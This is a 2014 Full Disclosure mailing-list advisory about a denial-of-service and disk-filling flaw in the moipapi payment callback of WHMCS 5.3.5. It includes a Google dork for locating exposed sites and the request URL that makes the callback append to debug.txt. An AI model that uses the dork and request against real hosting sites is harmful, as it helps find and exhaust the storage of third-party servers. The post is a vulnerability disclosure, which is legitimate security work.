WHMCS has been notified. # Exploit Title: WHMCS Moipapi DoS & Memory Consumption Vulnerability 5.3.5 # Google Dork: inurl:/modules/gateways/callback/moipapi.php -intext:"Gateway Module "moipapi" Not Activated" # Date: 23/7/2014 # Exploit Author: surivaton # Vendor Homepage: whmcs.com # Version: 5.3.5 # Tested on: Linux, Windows Possible denial of service with memory consumption and taking up disc space
URL: www.whmcshostedsite.com/modules/gateways/callback/moipapi.php?x= Enter what ever you want after x= Writes to debug.txt in same directory: www.whmcshostedsite.com/modules/gateways/callback/debug.txt What appears in debug.txt(a tad over 200 bytes): ----------------------------------- POST received: Array ( ) ----------------------------------- Return MoIP data Invoice: Date: 22/07/2014 09:36:53 Status [] Started payment. _______________________________________________ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
